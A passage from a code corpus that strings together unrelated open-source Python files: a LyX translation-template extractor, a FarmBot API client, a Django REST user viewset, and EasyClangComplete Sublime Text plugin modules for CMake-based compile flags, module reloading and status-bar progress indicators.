(string,) = Item.match(line).groups()
elif TableInsert.match(line):
(string,) = TableInsert.match(line).groups()
else:
continue
string = string.replace('"', '')
if string != "":
print >> output, '#: %s:%d\nmsgid "%s"\nmsgstr ""\n' % \
(relativePath(src, base), lineno+1, string)
input.close()
output.close()
def layouts_l10n(input_files, output, base, layouttranslations):
'''Generate pot file from lib/layouts/*.{layout,inc,module}'''
Style = re.compile(r'^\s*Style\s+(.*)\s*$', re.IGNORECASE)
# match LabelString, EndLabelString, LabelStringAppendix and maybe others but no comments
LabelString = re.compile(r'^[^#]*LabelString\S*\s+(.*)\s*$', re.IGNORECASE)
GuiName = re.compile(r'^\s*GuiName\s+(.*)\s*$', re.IGNORECASE)
ListName = re.compile(r'^\s*ListName\s+(.*)\s*$', re.IGNORECASE)
CategoryName = re.compile(r'^\s*Category\s+(.*)\s*$', re.IGNORECASE)
NameRE = re.compile(r'^\s*#\s*\\DeclareLyXModule.*{(.*)}$', re.IGNORECASE)
InsetLayout = re.compile(r'^InsetLayout\s+\"?(.*)\"?\s*$', re.IGNORECASE)
FlexCheck = re.compile(r'^Flex:(.*)', re.IGNORECASE)
DescBegin = re.compile(r'^\s*#DescriptionBegin\s*$', re.IGNORECASE)
DescEnd = re.compile(r'^\s*#\s*DescriptionEnd\s*$', re.IGNORECASE)
Category = re.compile(r'^\s*#\s*Category:\s+(.*)\s*$', re.IGNORECASE)
I18nPreamble = re.compile(r'^\s*((Lang)|(Babel))Preamble\s*$', re.IGNORECASE)
EndI18nPreamble = re.compile(r'^\s*End((Lang)|(Babel))Preamble\s*$', re.IGNORECASE)
I18nString = re.compile(r'_\(([^\)]+)\)')
CounterFormat = re.compile(r'^\s*PrettyFormat\s+"?(.*)"?\s*$', re.IGNORECASE)
CiteFormat = re.compile(r'^\s*CiteFormat', re.IGNORECASE)
KeyVal = re.compile(r'^\s*_\w+\s+(.*)\s*$')
Float = re.compile(r'^\s*Float\s*$', re.IGNORECASE)
UsesFloatPkg = re.compile(r'^\s*UsesFloatPkg\s+(.*)\s*$', re.IGNORECASE)
IsPredefined = re.compile(r'^\s*IsPredefined\s+(.*)\s*$', re.IGNORECASE)
End = re.compile(r'^\s*End', re.IGNORECASE)
Comment = re.compile(r'^(.*)#')
Translation = re.compile(r'^\s*Translation\s+(.*)\s*$', re.IGNORECASE)
KeyValPair = re.compile(r'\s*"(.*)"\s+"(.*)"')
oldlanguages = []
languages = []
keyset = set()
oldtrans = dict()
if layouttranslations:
linguas_file = os.path.join(base, 'LINGUAS')
for line in open(linguas_file).readlines():
res = Comment.search(line)
if res:
line = res.group(1)
if line.strip() != '':
languages.extend(line.split())
# read old translations if available
try:
input = open(output)
lang = ''
for line in input.readlines():
res = Comment.search(line)
if res:
line = res.group(1)
if line.strip() == '':
continue
res = Translation.search(line)
if res:
lang = res.group(1)
if lang not in languages:
oldlanguages.append(lang)
languages.append(lang)
oldtrans[lang] = dict()
continue
res = End.search(line)
if res:
lang = ''
continue
res = KeyValPair.search(line)
if res and lang != '':
key = res.group(1).decode('utf-8')
val = res.group(2).decode('utf-8')
key = key.replace('\\"', '"').replace('\\\\', '\\')
val = val.replace('\\"', '"').replace('\\\\', '\\')
oldtrans[lang][key] = val
keyset.add(key)
continue
print "Error: Unable to handle line:"
print line
except IOError:
print "Warning: Unable to open %s for reading." % output
print " Old translations will be lost."
# walon is not a known document language
# FIXME: Do not hardcode, read from lib/languages!
if 'wa' in languages:
languages.remove('wa')
out = open(output, 'w')
for src in input_files:
readingDescription = False
readingI18nPreamble = False
readingFloat = False
readingCiteFormats = False
isPredefined = False
usesFloatPkg = True
listname = ''
floatname = ''
descStartLine = -1
descLines = []
lineno = 0
for line in open(src).readlines():
lineno += 1
if readingDescription:
res = DescEnd.search(line)
if res != None:
readingDescription = False
desc = " ".join(descLines)
if not layouttranslations:
writeString(out, src, base, lineno + 1, desc)
continue
descLines.append(line[1:].strip())
continue
res = DescBegin.search(line)
if res != None:
readingDescription = True
descStartLine = lineno
continue
if readingI18nPreamble:
res = EndI18nPreamble.search(line)
if res != None:
readingI18nPreamble = False
continue
res = I18nString.search(line)
if res != None:
string = res.group(1)
if layouttranslations:
keyset.add(string)
else:
writeString(out, src, base, lineno, string)
continue
res = I18nPreamble.search(line)
if res != None:
readingI18nPreamble = True
continue
res = NameRE.search(line)
if res != None:
string = res.group(1)
if not layouttranslations:
writeString(out, src, base, lineno + 1, string)
continue
res = Style.search(line)
if res != None:
string = res.group(1)
string = string.replace('_', ' ')
# Style means something else inside a float definition
if not readingFloat:
if not layouttranslations:
writeString(out, src, base, lineno, string)
continue
res = LabelString.search(line)
if res != None:
string = res.group(1)
if not layouttranslations:
writeString(out, src, base, lineno, string)
continue
res = GuiName.search(line)
if res != None:
string = res.group(1)
if layouttranslations:
# gui name must only be added for floats
if readingFloat:
floatname = string
else:
writeString(out, src, base, lineno, string)
continue
res = CategoryName.search(line)
if res != None:
string = res.group(1)
if not layouttranslations:
writeString(out, src, base, lineno, string)
continue
res = ListName.search(line)
if res != None:
string = res.group(1)
if layouttranslations:
listname = string.strip('"')
else:
writeString(out, src, base, lineno, string)
continue
res = InsetLayout.search(line)
if res != None:
string = res.group(1)
string = string.replace('_', ' ')
#Flex:xxx is not used in translation
#if not layouttranslations:
# writeString(out, src, base, lineno, string)
m = FlexCheck.search(string)
if m:
if not layouttranslations:
writeString(out, src, base, lineno, m.group(1))
continue
res = Category.search(line)
if res != None:
string = res.group(1)
if not layouttranslations:
writeString(out, src, base, lineno, string)
continue
res = CounterFormat.search(line)
if res != None:
string = res.group(1)
if not layouttranslations:
writeString(out, src, base, lineno, string)
continue
res = Float.search(line)
if res != None:
readingFloat = True
continue
res = IsPredefined.search(line)
if res != None:
string = res.group(1).lower()
if string == 'true':
isPredefined = True
else:
isPredefined = False
continue
res = UsesFloatPkg.search(line)
if res != None:
string = res.group(1).lower()
if string == 'true':
usesFloatPkg = True
else:
usesFloatPkg = False
continue
res = CiteFormat.search(line)
if res != None:
readingCiteFormats = True
continue
res = End.search(line)
if res != None:
# If a float is predefined by the package and it does not need
# the float package then it uses the standard babel translations.
# This is even true for MarginFigure, MarginTable (both from
# tufte-book.layout) and Planotable, Plate (both from aguplus.inc).
if layouttranslations and readingFloat and usesFloatPkg and not isPredefined:
if floatname != '':
keyset.add(floatname)
if listname != '':
keyset.add(listname)
isPredefined = False
usesFloatPkg = True
listname = ''
floatname = ''
readingCiteFormats = False
readingFloat = False
continue
if readingCiteFormats:
res = KeyVal.search(line)
if res != None:
val = res.group(1)
if not layouttranslations:
writeString(out, src, base, lineno, val)
if layouttranslations:
# Extract translations of layout files
import polib
# Sort languages and key to minimize the diff between different runs
# with changed translations
languages.sort()
keys = []
for key in keyset:
keys.append(key)
keys.sort()
print >> out, '''# This file has been automatically generated by po/lyx_pot.py.
# PLEASE MODIFY ONLY THE LANGUAGES HAVING NO .po FILE! If you want to regenerate
# this file from the translations, run `make ../lib/layouttranslations' in po.
# Python polib library is needed for building the output file.
#
# This file should remain fixed during minor LyX releases.
# For more comments see README.localization file.'''
for lang in languages:
print >> out, '\nTranslation %s' % lang
if lang in oldtrans.keys():
trans = oldtrans[lang]
else:
trans = dict()
if not lang in oldlanguages:
poname = os.path.join(base, 'po/' + lang + '.po')
po = polib.pofile(poname)
# Iterate through po entries and not keys for speed reasons.
# FIXME: The code is still too slow
for entry in po:
if not entry.translated():
continue
if entry.msgid in keys:
key = entry.msgid
val = entry.msgstr
# some translators keep untranslated entries
if val != key:
trans[key] = val
for key in keys:
if key in trans.keys():
val = trans[key].replace('\\', '\\\\').replace('"', '\\"')
key = key.replace('\\', '\\\\').replace('"', '\\"')
print >> out, '\t"%s" "%s"' % \
(key.encode('utf-8'), val.encode('utf-8'))
# also print untranslated entries to help translators
elif not lang in oldlanguages:
key = key.replace('\\', '\\\\').replace('"', '\\"')
print >> out, '\t"%s" "%s"' % \
(key.encode('utf-8'), key.encode('utf-8'))
print >> out, 'End'
out.close()
def qt4_l10n(input_files, output, base):
'''Generate pot file from src/frontends/qt4/ui/*.ui'''
output = open(output, 'w')
pat = re.compile(r'\s*<string>(.*)</string>')
prop = re.compile(r'\s*<property.*name.*=.*shortcut')
for src in input_files:
input = open(src)
skipNextLine = False
for lineno, line in enumerate(input.readlines()):
# skip the line after <property name=shortcut>
if skipNextLine:
skipNextLine = False
continue
if prop.match(line):
skipNextLine = True
continue
# get lines that match <string>...</string>
if pat.match(line):
(string,) = pat.match(line).groups()
                # unescape the XML entities used in .ui files
                string = string.replace('&amp;', '&').replace('&quot;', '"')
                string = string.replace('&lt;', '<').replace('&gt;', '>')
                string = string.replace('\\', '\\\\').replace('"', r'\"')
                string = string.replace('&#x0a;', r'\n')
print >> output, '#: %s:%d\nmsgid "%s"\nmsgstr ""\n' % \
(relativePath(src, base), lineno+1, string)
input.close()
output.close()
def languages_l10n(input_files, output, base):
'''Generate pot file from lib/languages'''
out = open(output, 'w')
GuiName = re.compile(r'^[^#]*GuiName\s+(.*)', re.IGNORECASE)
for src in input_files:
descStartLine = -1
descLines = []
lineno = 0
for line in open(src).readlines():
lineno += 1
res = GuiName.search(line)
if res != None:
string = res.group(1)
writeString(out, src, base, lineno, string)
continue
out.close()
def external_l10n(input_files, output, base):
'''Generate pot file from lib/external_templates'''
output = open(output, 'w')
Template = re.compile(r'^Template\s+(.*)', re.IGNORECASE)
GuiName = re.compile(r'\s*GuiName\s+(.*)', re.IGNORECASE)
HelpTextStart = re.compile(r'\s*HelpText\s', re.IGNORECASE)
HelpTextSection = re.compile(r'\s*(\S.*)\s*$')
HelpTextEnd = re.compile(r'\s*HelpTextEnd\s', re.IGNORECASE)
i = -1
for src in input_files:
input = open(src)
inHelp = False
hadHelp = False
prev_help_string = ''
for lineno, line in enumerate(input.readlines()):
if Template.match(line):
(string,) = Template.match(line).groups()
elif GuiName.match(line):
(string,) = GuiName.match(line).groups()
elif inHelp:
if HelpTextEnd.match(line):
if hadHelp:
print >> output, '\nmsgstr ""\n'
inHelp = False
hadHelp = False
prev_help_string = ''
elif HelpTextSection.match(line):
(help_string,) = HelpTextSection.match(line).groups()
help_string = help_string.replace('"', '')
if help_string != "" and prev_help_string == '':
print >> output, '#: %s:%d\nmsgid ""\n"%s\\n"' % \
(relativePath(src, base), lineno+1, help_string)
hadHelp = True
elif help_string != "":
print >> output, '"%s\\n"' % help_string
prev_help_string = help_string
elif HelpTextStart.match(line):
inHelp = True
prev_help_string = ''
else:
continue
string = string.replace('"', '')
if string != "" and not inHelp:
print >> output, '#: %s:%d\nmsgid "%s"\nmsgstr ""\n' % \
(relativePath(src, base), lineno+1, string)
input.close()
output.close()
def formats_l10n(input_files, output, base):
'''Generate pot file from configure.py'''
output = open(output, 'w')
GuiName = re.compile(r'.*\\Format\s+\S+\s+\S+\s+"([^"]*)"\s+(\S*)\s+.*', re.IGNORECASE)
GuiName2 = re.compile(r'.*\\Format\s+\S+\s+\S+\s+([^"]\S+)\s+(\S*)\s+.*', re.IGNORECASE)
input = open(input_files[0])
for lineno, line in enumerate(input.readlines()):
label = ""
labelsc = ""
if GuiName.match(line):
label = GuiName.match(line).group(1)
shortcut = GuiName.match(line).group(2).replace('"', '')
elif GuiName2.match(line):
label = GuiName2.match(line).group(1)
shortcut = GuiName2.match(line).group(2).replace('"', '')
else:
continue
label = label.replace('\\', '\\\\').replace('"', '')
if shortcut != "":
labelsc = label + "|" + shortcut
if label != "":
print >> output, '#: %s:%d\nmsgid "%s"\nmsgstr ""\n' % \
(relativePath(input_files[0], base), lineno+1, label)
if labelsc != "":
print >> output, '#: %s:%d\nmsgid "%s"\nmsgstr ""\n' % \
(relativePath(input_files[0], base), lineno+1, labelsc)
input.close()
output.close()
def encodings_l10n(input_files, output, base):
'''Generate pot file from lib/encodings'''
output = open(output, 'w')
# assuming only one encodings file
# Encoding utf8 utf8 "Unicode (utf8)" UTF-8 variable inputenc
reg = re.compile('Encoding [\w-]+\s+[\w-]+\s+"([\w \-\(\)]+)"\s+[\w-]+\s+(fixed|variable)\s+\w+.*')
input = open(input_files[0])
for lineno, line in enumerate(input.readlines()):
if not line.startswith('Encoding'):
continue
if reg.match(line):
print >> output, '#: %s:%d\nmsgid "%s"\nmsgstr ""\n' % \
(relativePath(input_files[0], base), lineno+1, reg.match(line).groups()[0])
else:
print "Error: Unable to handle line:"
print line
# No need to abort if the parsing fails
# sys.exit(1)
input.close()
output.close()
Usage = '''
lyx_pot.py [-b|--base top_src_dir] [-o|--output output_file] [-h|--help] [-s|--src_file filename] -t|--type input_type input_files
where
--base:
path to the top source directory. default to '.'
--output:
output pot file, default to './lyx.pot'
--src_file
        file listing one input file per line
--input_type can be
ui: lib/ui/*
layouts: lib/layouts/*
layouttranslations: create lib/layouttranslations from po/*.po and lib/layouts/*
qt4: qt4 ui files
languages: file lib/languages
encodings: file lib/encodings
external: external templates file
formats: formats predefined in lib/configure.py
'''
if __name__ == '__main__':
input_type = None
output = 'lyx.pot'
base = '.'
input_files = []
#
optlist, args = getopt.getopt(sys.argv[1:], 'ht:o:b:s:',
['help', 'type=', 'output=', 'base=', 'src_file='])
for (opt, value) in optlist:
if opt in ['-h', '--help']:
print Usage
sys.exit(0)
elif opt in ['-o', '--output']:
output = value
elif opt in ['-b', '--base']:
base = value
elif opt in ['-t', '--type']:
input_type = value
elif opt in ['-s', '--src_file']:
input_files = [f.strip() for f in open(value)]
if input_type not in ['ui', 'layouts', 'layouttranslations', 'qt4', 'languages', 'encodings', 'external', 'formats'] or output is None:
print 'Wrong input type or output filename.'
sys.exit(1)
input_files += args
if input_type == 'ui':
ui_l10n(input_files, output, base)
elif input_type == 'layouts':
layouts_l10n(input_files, output, base, False)
elif input_type == 'layouttranslations':
layouts_l10n(input_files, output, base, True)
elif input_type == 'qt4':
qt4_l10n(input_files, output, base)
elif input_type == 'external':
external_l10n(input_files, output, base)
elif input_type == 'formats':
formats_l10n(input_files, output, base)
elif input_type == 'encodings':
encodings_l10n(input_files, output, base)
else:
languages_l10n(input_files, output, base)
```
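The extraction patterns can be sanity-checked in isolation; a small self-contained probe of the `ui_l10n()` regexes (written for Python 3 here, although the script itself targets Python 2):

```python
import re

Submenu = re.compile(r'^[^#]*Submenu\s+"([^"]*)"', re.IGNORECASE)
Item = re.compile(r'[^#]*Item\s+"([^"]*)"', re.IGNORECASE)

print(Submenu.match('Submenu "File|F"').group(1))  # -> File|F
print(Item.match('  Item "New|N"').group(1))       # -> New|N
print(Submenu.match('# Submenu "commented out"'))  # -> None (comments are skipped)
```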
|
{
"source": "jedzky/ps2101",
"score": 3
}
|
#### File: ps2101/ps2101/farmbot_interface.py
```python
import requests
import json
import random
import os
import uuid
class Farmbot:
def plants(self, headers):
        # Request the FarmBot's plants
r = requests.get('https://my.farm.bot/api/points', headers=headers)
# Handles if request has failed
if(r.status_code != 200):
return "error"
# Loads Json into objects
json_data = json.loads(r.content)
# Creates a list
col_values = []
# Fills list with only plants
for points in json_data:
if points['pointer_type'] == 'Plant':
col_values.append({'id': points['id'], 'name': points['name'], 'x': points['x'],'y': points['y'], 'z': points['z']})
return col_values
    # Unfinished function
    def plant_images(self, headers):
        r = requests.get('https://my.farm.bot/api/images', headers=headers)
        if(r.status_code != 200):
            return "error"
        json_data = json.loads(r.content)
        image_paths = []  # renamed from `list` to avoid shadowing the built-in
        for i, image in enumerate(json_data):
            if i >= 20:  # only download the first 20 images
                break
            url = image['attachment_url']
            response = requests.get(url)
            img_name = os.path.join(os.getcwd(), 'images', str(uuid.uuid4()) + '.jpg')
            image_paths.append(img_name)
            with open(img_name, 'wb') as f:  # ensure the file handle is closed
                f.write(response.content)
        return image_paths
def sensor_pin(self, headers):
r = requests.get('https://my.farm.bot/api/sensors', headers=headers)
if(r.status_code != 200):
return "error"
json_data = json.loads(r.content)
for tools in json_data:
if tools['label'] == 'Soil Sensor':
return tools['pin']
return -1
# Only grabs the latest
def latest_sensor_reading(self, headers, pin):
r = requests.get('https://my.farm.bot/api/sensor_readings', headers=headers)
if(r.status_code != 200):
return "error"
json_data = json.loads(r.content)
for readings in json_data:
if readings['pin'] == pin:
return (readings['value'])
return -1
def user_info(self, headers):
r = requests.get('https://my.farm.bot/api/users', headers=headers)
if(r.status_code != 200):
return "error"
json_data = json.loads(r.content)
return json_data[0]['id']
```
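Usage sketch: the my.farm.bot API authenticates with a JWT bearer token (the token below is a placeholder, not a real credential):

```python
headers = {
    'Authorization': 'Bearer <YOUR_API_TOKEN>',  # placeholder token
    'Content-Type': 'application/json',
}

bot = Farmbot()
plants = bot.plants(headers)
if plants != "error":
    for plant in plants:
        print(plant['name'], plant['x'], plant['y'])
```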
|
{
"source": "jee1mr/care",
"score": 2
}
|
#### File: users/api/views.py
```python
from django.contrib.auth import get_user_model
from rest_framework import status
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework import viewsets
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from users.api.serializers import UserSerializer
User = get_user_model()
class UserViewSet(viewsets.ModelViewSet):
"""
A viewset for viewing and manipulating user instances.
"""
serializer_class = UserSerializer
queryset = User.objects.filter(deleted=False)
lookup_field = "username"
def get_permissions(self):
if self.request.method == "POST":
self.permission_classes = (
IsAuthenticated,
IsAdminUser,
)
else:
self.permission_classes = (IsAuthenticated,)
return super().get_permissions()
    def get_queryset(self):
        if self.request.method in ("DELETE", "PUT"):
            return self.queryset.filter(id=self.request.user.id)
        return self.queryset
@action(detail=False, methods=["GET"])
def getcurrentuser(self, request):
return Response(
status=status.HTTP_200_OK,
data=self.serializer_class(request.user, context={"request": request}).data,
)
```
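Typical wiring for this viewset (illustrative; the project's actual `urls.py` is not shown here) uses DRF's `DefaultRouter`:

```python
from rest_framework.routers import DefaultRouter

from users.api.views import UserViewSet

router = DefaultRouter()
router.register(r'users', UserViewSet)
urlpatterns = router.urls
```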
|
{
"source": "jeeb/EasyClangComplete",
"score": 3
}
|
#### File: plugin/flags_sources/cmake_file.py
```python
from .flags_source import FlagsSource
from .compilation_db import CompilationDb
from ..tools import File
from ..tools import Tools
from ..utils.singleton import CMakeFileCache
from ..utils.catkinizer import Catkinizer
from ..utils.search_scope import TreeSearchScope
from os import path
import logging
import re
import os
log = logging.getLogger("ECC")
class CMakeFile(FlagsSource):
"""Manages generating a compilation database with cmake.
Attributes:
_cache (dict): Cache of database filenames for each analyzed
CMakeLists.txt file and of CMakeLists.txt file paths for each
analyzed view path.
"""
_FILE_NAME = 'CMakeLists.txt'
_DEP_REGEX = re.compile(r'\"(.+\..+)\"')
def __init__(self,
include_prefixes,
prefix_paths,
flags,
cmake_binary,
header_to_source_mapping,
target_compilers,
lazy_flag_parsing):
"""Initialize a cmake-based flag storage.
Args:
include_prefixes (str[]): A List of valid include prefixes.
prefix_paths (str[]): A list of paths to append to
CMAKE_PREFIX_PATH before invoking cmake.
flags (str[]): flags to pass to CMake
"""
super().__init__(include_prefixes)
self._cache = CMakeFileCache()
self.__cmake_prefix_paths = prefix_paths
self.__cmake_flags = flags
self.__cmake_binary = cmake_binary
self.__header_to_source_mapping = header_to_source_mapping
self.__target_compilers = target_compilers
self.__lazy_flag_parsing = lazy_flag_parsing
def get_flags(self, file_path=None, search_scope=None):
"""Get flags for file.
Args:
file_path (None, optional): A path to the query file. This
function returns a list of flags for this specific file.
search_scope (SearchScope, optional): Where to search for a
CMakeLists.txt file.
Returns:
str[]: List of flags for this view, or all flags merged if this
view path is not found in the generated compilation db.
"""
# prepare search scope
search_scope = self._update_search_scope_if_needed(
search_scope, file_path)
# TODO(igor): probably can be simplified. Why do we need to load
# cached? should we just test if currently found one is in cache?
log.debug("[cmake]:[get]: for file %s", file_path)
cached_cmake_path = self._get_cached_from(file_path)
log.debug("[cmake]:[cached]: '%s'", cached_cmake_path)
current_cmake_file = File.search(
file_name=self._FILE_NAME,
search_scope=search_scope,
search_content=['project(', 'project ('])
if not current_cmake_file:
log.debug("No CMakeLists.txt file with 'project' in it found.")
return None
current_cmake_path = current_cmake_file.full_path
log.debug("[cmake]:[current]: '%s'", current_cmake_path)
parsed_before = current_cmake_path in self._cache
if parsed_before:
log.debug("[cmake]: found cached CMakeLists.txt.")
cached_cmake_path = current_cmake_path
# remember that for this file we have found this cmakelists
self._cache[file_path] = current_cmake_path
path_unchanged = (current_cmake_path == cached_cmake_path)
file_unchanged = File.is_unchanged(cached_cmake_path)
if path_unchanged and file_unchanged:
use_cached = True
if CMakeFile.__need_cmake_rerun(cached_cmake_path):
use_cached = False
if cached_cmake_path not in self._cache:
use_cached = False
if use_cached:
log.debug("[cmake]:[unchanged]: use existing db.")
db_file_path = self._cache[cached_cmake_path]
db = CompilationDb(
self._include_prefixes,
self.__header_to_source_mapping,
self.__lazy_flag_parsing)
db_search_scope = TreeSearchScope(
from_folder=path.dirname(db_file_path))
return db.get_flags(file_path, db_search_scope)
# Check if CMakeLists.txt is a catkin project and add needed settings.
catkinizer = Catkinizer(current_cmake_file)
catkinizer.catkinize_if_needed()
# Generate a new compilation database file and return flags from it.
log.debug("[cmake]:[generate new db]")
db_file = CMakeFile.__compile_cmake(
cmake_file=File(current_cmake_path),
cmake_binary=self.__cmake_binary,
prefix_paths=self.__cmake_prefix_paths,
flags=self.__cmake_flags,
target_compilers=self.__target_compilers)
if not db_file:
return None
if file_path:
# write the current cmake file to cache
self._cache[file_path] = current_cmake_path
self._cache[current_cmake_path] = db_file.full_path
File.update_mod_time(current_cmake_path)
db = CompilationDb(
self._include_prefixes,
self.__header_to_source_mapping,
self.__lazy_flag_parsing)
db_search_scope = TreeSearchScope(from_folder=db_file.folder)
flags = db.get_flags(file_path, db_search_scope)
return flags
@staticmethod
def unique_folder_name(cmake_path):
"""Get unique build folder name.
Args:
cmake_path (str): Path to CMakeLists of this project.
Returns:
str: Path to a unique temp folder.
"""
unique_proj_str = Tools.get_unique_str(cmake_path)
tempdir = path.join(
Tools.get_temp_dir(), 'cmake_builds', unique_proj_str)
return tempdir
@staticmethod
def __compile_cmake(cmake_file, cmake_binary, prefix_paths, flags,
target_compilers):
"""Compile cmake given a CMakeLists.txt file.
This returns a new compilation database path to further parse the
generated flags. The build is performed in a temporary folder with a
unique folder name for the project being built - a hex number
        generated from the full path to the current CMakeLists.txt file.
Args:
cmake_file (tools.file): file object for CMakeLists.txt file
prefix_paths (str[]): paths to add to CMAKE_PREFIX_PATH before
running `cmake`
flags (str[]): flags to pass to cmake
target_compilers(dict): Compilers to use
"""
if not cmake_file or not cmake_file.loaded():
return None
if not prefix_paths:
prefix_paths = []
if not flags:
flags = []
cmake_cmd = [cmake_binary, '-DCMAKE_EXPORT_COMPILE_COMMANDS=ON'] \
+ flags + [cmake_file.folder]
tempdir = CMakeFile.unique_folder_name(cmake_file.full_path)
try:
os.makedirs(tempdir)
except OSError:
log.debug("Folder %s exists.", tempdir)
# sometimes there are variables missing to carry out the build. We
# can set them here from the settings.
my_env = os.environ.copy()
log.debug("prefix paths: %s", prefix_paths)
merged_paths = ""
for prefix_path in prefix_paths:
merged_paths += prefix_path + ":"
merged_paths = merged_paths[:-1]
log.debug("merged paths: %s", merged_paths)
my_env['CMAKE_PREFIX_PATH'] = merged_paths
log.debug("CMAKE_PREFIX_PATH: %s", my_env['CMAKE_PREFIX_PATH'])
# If target compilers are set, create a toolchain file to force
# cmake using them:
c_compiler = target_compilers.get(Tools.LANG_C_TAG, None)
cpp_compiler = target_compilers.get(Tools.LANG_CPP_TAG, None)
# Note: CMake does not let us explicitly set Objective-C/C++ compilers.
# Hence, we only set ones for C/C++ and let it derive the rest.
if c_compiler is not None or cpp_compiler is not None:
toolchain_file_path = path.join(tempdir, "ECC-Toolchain.cmake")
with open(toolchain_file_path, "w") as file:
file.write("include(CMakeForceCompiler)\n")
if c_compiler is not None:
file.write(
"set(CMAKE_C_COMPILER {})\n".format(c_compiler))
if cpp_compiler is not None:
file.write(
"set(CMAKE_CPP_COMPILER {})\n".format(cpp_compiler))
cmake_cmd += ["-DCMAKE_TOOLCHAIN_FILE={}".format(
toolchain_file_path)]
log.debug(' running command: %s', cmake_cmd)
output_text = Tools.run_command(
command=cmake_cmd, cwd=tempdir, env=my_env)
log.debug("cmake produced output: \n%s", output_text)
database_path = path.join(tempdir, CompilationDb._FILE_NAME)
if not path.exists(database_path):
log.error("cmake has finished, but no compilation database.")
return None
# update the dependency modification time
dep_file_path = path.join(tempdir, 'CMakeFiles', 'Makefile.cmake')
if path.exists(dep_file_path):
for dep_path in CMakeFile.__get_cmake_deps(dep_file_path):
File.update_mod_time(dep_path)
return File(database_path)
@staticmethod
def __get_cmake_deps(deps_file):
"""Parse dependencies from Makefile.cmake.
Args:
deps_file (str): Full path to Makefile.cmake file.
Returns:
str[]: List of full paths to dependency files.
"""
folder = path.dirname(path.dirname(deps_file))
deps = []
with open(deps_file, 'r') as f:
content = f.read()
found = CMakeFile._DEP_REGEX.findall(content)
for dep in found:
if not path.isabs(dep):
dep = path.join(folder, dep)
deps.append(dep)
return deps
@staticmethod
def __need_cmake_rerun(cmake_path):
tempdir = CMakeFile.unique_folder_name(cmake_path)
if not path.exists(tempdir):
# temp folder not there. We need to run cmake to generate one.
return True
dep_file_path = path.join(tempdir, 'CMakeFiles', 'Makefile.cmake')
if not path.exists(dep_file_path):
# no file that manages dependencies, we need to run cmake.
return True
# now check if the deps actually changed since we last saw them
for dep_file in CMakeFile.__get_cmake_deps(dep_file_path):
if not path.exists(dep_file):
return True
if not File.is_unchanged(dep_file):
return True
return False
```
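`Tools.get_unique_str` is defined elsewhere in the plugin; the "unique build folder" idea it supports can be sketched standalone, with `hashlib` as a plausible stand-in for the real helper:

```python
import hashlib
import tempfile
from os import path

def unique_folder_name(cmake_path):
    """Hash the CMakeLists.txt path into a reusable temp build dir name."""
    digest = hashlib.md5(cmake_path.encode('utf-8')).hexdigest()
    return path.join(tempfile.gettempdir(), 'cmake_builds', digest)

print(unique_folder_name('/home/user/project/CMakeLists.txt'))
```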
#### File: plugin/utils/module_reloader.py
```python
import sys
import imp
import logging
from ..tools import PKG_NAME
log = logging.getLogger("ECC")
class ModuleReloader:
"""Reloader for all dependencies."""
MAX_RELOAD_TRIES = 10
@staticmethod
def reload_all(ignore_string='singleton'):
"""Reload all loaded modules."""
prefix = PKG_NAME + '.plugin.'
# reload all twice to make sure all dependencies are satisfied
log.debug(
"Reloading modules that start with '%s' and don't contain '%s'",
prefix, ignore_string)
log.debug("Reload all modules first time")
ModuleReloader.reload_once(prefix, ignore_string)
log.debug("Reload all modules second time")
ModuleReloader.reload_once(prefix, ignore_string)
log.debug("All modules reloaded")
    @staticmethod
    def reload_once(prefix, ignore_string, try_counter=0):
        """Reload all modules once, retrying up to MAX_RELOAD_TRIES times."""
        try:
            # iterate over a snapshot: reloading can mutate sys.modules
            for name, module in list(sys.modules.items()):
                if name.startswith(prefix) and ignore_string not in name:
                    log.debug("Reloading module: '%s'", name)
                    imp.reload(module)
        except OSError as e:
            if try_counter >= ModuleReloader.MAX_RELOAD_TRIES:
                log.fatal("Too many tries to reload and no success. Fail.")
                return
            # pass the counter through the recursion; resetting a local
            # counter on every retry would keep the limit from triggering
            try_counter += 1
            log.error("Received an error: %s on try %s. Try again.",
                      e, try_counter)
            ModuleReloader.reload_once(prefix, ignore_string, try_counter)
```
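`imp` has been deprecated since Python 3.4; on a modern interpreter the same reload loop can be written with `importlib` (a sketch with equivalent semantics, minus the retry logic):

```python
import importlib
import sys

def reload_matching(prefix, ignore_string='singleton'):
    # copy the items: reloading may add new entries to sys.modules
    for name, module in list(sys.modules.items()):
        if name.startswith(prefix) and ignore_string not in name:
            importlib.reload(module)
```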
#### File: plugin/utils/progress_status.py
```python
import sublime
MSG_CHARS_MOON = u'🌑🌒🌓🌔🌕🌖🌗🌘'
MSG_READY_MOON = u'✔'
MSG_CHARS_COLOR_SUBLIME = u'⣾⣽⣻⢿⡿⣟⣯⣷'
MSG_READY_COLOR_SUBLIME = ' READY '
class BaseProgressStatus(object):
"""A base class for progress status."""
MSG_TAG = '000_ECC'
MSG_MASK = 'ECC: [{}]'
def __init__(self):
"""Initialize progress status."""
self.showing = False
self.msg_chars = None
self.msg_ready = None
@staticmethod
def set_status(message):
"""Set status message for the current view."""
view = sublime.active_window().active_view()
view.set_status(BaseProgressStatus.MSG_TAG, message)
def erase_status(self):
"""Erase status message for the current view."""
self.showing = False
view = sublime.active_window().active_view()
view.erase_status(BaseProgressStatus.MSG_TAG)
def show_ready_message(self):
"""Show ready message."""
if not self.showing:
return
BaseProgressStatus.set_status(
BaseProgressStatus.MSG_MASK.format(self.msg_ready))
def show_next_message(self):
"""Abstract method. Generate next message."""
raise NotImplementedError("abstract method is called")
class MoonProgressStatus(BaseProgressStatus):
"""Progress status that shows phases of the moon."""
def __init__(self):
"""Init moon progress status."""
super().__init__()
self.idx = 0
self.msg_chars = MSG_CHARS_MOON
self.msg_ready = MSG_READY_MOON
def show_next_message(self):
"""Show next moon phase message."""
if not self.showing:
return
chars = self.msg_chars
mod = len(chars)
self.idx = (self.idx + 1) % mod
BaseProgressStatus.set_status(
BaseProgressStatus.MSG_MASK.format(chars[self.idx]))
class ColorSublimeProgressStatus(BaseProgressStatus):
"""Progress status that shows phases of the moon."""
def __init__(self):
"""Init color sublime like progress status."""
super().__init__()
self.msg_chars = MSG_CHARS_COLOR_SUBLIME
self.msg_ready = MSG_READY_COLOR_SUBLIME
def show_next_message(self):
"""Show next random progress message."""
if not self.showing:
return
from random import sample
mod = len(self.msg_chars)
rands = [self.msg_chars[x % mod] for x in sample(range(100), 10)]
BaseProgressStatus.set_status(
BaseProgressStatus.MSG_MASK.format(''.join(rands)))
class NoneSublimeProgressStatus(BaseProgressStatus):
"""Progress status that does nothing."""
def __init__(self):
